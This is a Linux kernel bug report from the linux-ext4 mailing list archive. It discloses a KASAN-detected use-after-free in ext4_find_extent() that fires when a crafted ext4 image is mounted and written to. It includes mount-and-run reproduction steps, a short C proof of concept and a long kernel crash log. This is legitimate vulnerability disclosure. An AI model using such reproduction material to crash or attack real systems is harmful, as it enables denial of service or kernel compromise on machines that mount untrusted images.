lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date:   Fri, 08 Jun 2018 13:03:43 +0000
From:   bugzilla-daemon@...zilla.kernel.org
To:     linux-ext4@...nel.org
Subject: [Bug 199989] New: use-after-free() detected by KASAN in
 ext4_find_extent() when mounting and writing to a crafted ext4 image

https://bugzilla.kernel.org/show_bug.cgi?id=199989

            Bug ID: 199989
           Summary: use-after-free() detected by KASAN in
                    ext4_find_extent() when mounting and writing to a
                    crafted ext4 image
           Product: File System
           Version: 2.5
    Kernel Version: 4.17-rc4
          Hardware: All
                OS: Linux
              Tree: Mainline
            Status: NEW
          Severity: normal
          Priority: P1
         Component: ext4
          Assignee: fs_ext4@...nel-bugs.osdl.org
          Reporter: wen.xu@...ech.edu
        Regression: No

Created attachment 276395
  --> https://bugzilla.kernel.org/attachment.cgi?id=276395&action=edit
The (compressed) crafted image which causes crash

- Overview
use-after-free() detected by KASAN in ext4_find_extent() when mounting and
writing to a crafted ext4 image

- Reproduce (on KASAN build of ext4-dev branch)
# mkdir mnt
# mount -t ext4 245.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {

  char *foo_bar_baz;
  int err;

  static int buf[8192];
  memset(buf, 0, sizeof(buf));

  err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);
  int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
  if (fd >= 0) {
    write(fd, (char *)buf, 517);
    write(fd, (char *)buf, sizeof(buf));
    fdatasync(fd);

    close(fd);
  }

}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}

- Kernel message
[  465.204685] EXT4-fs (loop0): 1 truncate cleaned up
[  465.204691] EXT4-fs (loop0): recovery complete
[  465.331842] EXT4-fs (loop0): mounted filesystem with ordered data mode.
Opts: (null)
[  468.963356] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  469.009066]
==================================================================
[  469.010744] BUG: KASAN: use-after-free in ext4_find_extent+0x140/0x450
[  469.012151] Read of size 4 at addr ffff8801ec9174c4 by task a.out/1753

[  469.014191] CPU: 1 PID: 1753 Comm: a.out Not tainted 4.17.0-rc4+ #5
[  469.014195] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  469.014202] Call Trace:
[  469.014248]  dump_stack+0x7b/0xb5
[  469.014284]  print_address_description+0x70/0x290
[  469.014291]  kasan_report+0x291/0x390
[  469.014299]  ? ext4_find_extent+0x140/0x450
[  469.014304]  __asan_load4+0x78/0x80
[  469.014309]  ext4_find_extent+0x140/0x450
[  469.014314]  ? kmem_cache_alloc_node_trace+0x90/0x230
[  469.014320]  ext4_ext_map_blocks+0x144/0x1f60
[  469.014326]  ? ext4_find_delalloc_cluster+0x60/0x60
[  469.014343]  ? __put_compound_page+0x50/0x50
[  469.014351]  ? mpage_process_page_bufs+0x179/0x270
[  469.014357]  ? __pagevec_release+0x55/0x60
[  469.014361]  ? mpage_prepare_extent_to_map+0x56f/0x590
[  469.014366]  ? kasan_check_write+0x14/0x20
[  469.014371]  ? ext4_es_lookup_extent+0x276/0x310
[  469.014376]  ext4_map_blocks+0x246/0xa50
[  469.014386]  ? memcg_kmem_put_cache+0x1b/0xa0
[  469.014391]  ? ext4_issue_zeroout+0xa0/0xa0
[  469.014397]  ? __ext4_journal_start_sb+0x89/0x180
[  469.014402]  ext4_writepages+0xcd5/0x1500
[  469.014409]  ? ext4_mark_inode_dirty+0x3d0/0x3d0
[  469.014433]  ? aa_path_link+0x210/0x210
[  469.014438]  ? kasan_slab_free+0xe/0x10
[  469.014442]  ? kmem_cache_free+0x89/0x1e0
[  469.014456]  ? putname+0x80/0x90
[  469.014461]  ? do_sys_open+0x22e/0x2c0
[  469.014464]  ? __x64_sys_open+0x4c/0x60
[  469.014482]  ? iov_iter_init+0x82/0xc0
[  469.014488]  do_writepages+0x37/0xb0
[  469.014496]  ? ext4_mark_inode_dirty+0x3d0/0x3d0
[  469.014501]  ? do_writepages+0x37/0xb0
[  469.014517]  __filemap_fdatawrite_range+0x19a/0x1f0
[  469.014523]  ? delete_from_page_cache_batch+0x4e0/0x4e0
[  469.014535]  ? fsnotify+0x695/0x720
[  469.014540]  ? __fsnotify_inode_delete+0x20/0x20
[  469.014546]  file_write_and_wait_range+0x66/0xb0
[  469.014552]  ext4_sync_file+0x1e3/0x670
[  469.014557]  ? ext4_getfsmap+0x4d0/0x4d0
[  469.014572]  vfs_fsync_range+0x68/0x100
[  469.014580]  ? __fget_light+0xc9/0xe0
[  469.014585]  do_fsync+0x3d/0x70
[  469.014590]  __x64_sys_fdatasync+0x24/0x30
[  469.014612]  do_syscall_64+0x78/0x170
[  469.014627]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  469.014643] RIP: 0033:0x7fcb74211800
[  469.014646] RSP: 002b:00007ffdd2938d48 EFLAGS: 00000246 ORIG_RAX:
000000000000004b
[  469.014656] RAX: ffffffffffffffda RBX: 0000000000000000 RCX:
00007fcb74211800
[  469.014659] RDX: 0000000000008000 RSI: 00000000006010a0 RDI:
0000000000000003
[  469.014661] RBP: 00007ffdd2938d80 R08: 00000000022f6010 R09:
0000000000000000
[  469.014664] R10: 00000000000002e8 R11: 0000000000000246 R12:
0000000000400610
[  469.014666] R13: 00007ffdd2938e80 R14: 0000000000000000 R15:
0000000000000000

[  469.015042] The buggy address belongs to the page:
[  469.016103] page:ffffea0007b245c0 count:0 mapcount:0
mapping:0000000000000000 index:0x2
[  469.017799] flags: 0x2ffff0000000000()
[  469.018613] raw: 02ffff0000000000 0000000000000000 0000000000000002
00000000ffffffff
[  469.020260] raw: dead000000000100 dead000000000200 0000000000000000
0000000000000000
[  469.021890] page dumped because: kasan: bad access detected

[  469.023407] Memory state around the buggy address:
[  469.024441]  ffff8801ec917380: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff
[  469.025960]  ffff8801ec917400: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff
[  469.027480] >ffff8801ec917480: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff
[  469.029010]                                            ^
[  469.030142]  ffff8801ec917500: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff
[  469.031674]  ffff8801ec917580: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff
[  469.033199]
==================================================================
[  469.034726] Disabling lock debugging due to kernel taint
[  469.056481] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  469.108459] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  469.168475] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  469.228454] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  469.280453] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  469.344443] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  469.396441] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  469.448445] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  469.508445] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  474.000496] EXT4-fs error: 89 callbacks suppressed
[  474.000515] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  474.048380] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  474.112358] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  474.160564] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  474.208348] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  474.264378] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  474.308344] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  474.352355] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  474.412464] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117
[  474.460409] EXT4-fs error (device loop0): ext4_xattr_inode_iget:390: comm
a.out: error while reading EA inode 1528337011 err=-117

- Reason
https://elixir.bootlin.com/linux/v4.17-rc7/source/fs/ext4/extents.c#L897
Based on the information given by KASAN report, UAF happens in
ext4_ext_binsearch_idx(). When calculating median (ext4_extent_idx* m) in
binary search, a dangling pointer is accessed.

Reported by Wen Xu (wen.xu@...ech.edu) from SSLab at Gatech.

Note that the bug may require several tries to reproduce on KASAN build.

-- 
You are receiving this mail because:
You are watching the assignee of the bug.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ